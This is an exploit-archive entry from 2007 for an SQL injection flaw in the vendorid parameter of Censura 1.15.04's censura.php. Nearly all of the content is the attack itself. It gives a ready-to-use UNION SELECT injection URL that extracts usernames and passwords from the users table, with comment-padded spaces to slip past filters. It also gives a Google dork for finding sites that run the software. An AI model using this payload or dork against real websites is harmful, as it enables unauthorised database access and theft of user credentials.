[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability
# Published : 2007-05-03
# Author : xoron
# Previous Title : Pre Shopping Mall 1.0 Remote SQL Injection Vulnerability
# Next Title : PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability
==============================================
Censura v1.15.04 (vendorid) Remote SQL Injection
==============================================
Found: Cyber-Security.org
==============================================
Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
==============================================
google dork: "Powered by: Censura"
vendor: http://www.censura.info/
==============================================
# www.Syue.com [2007-05-03]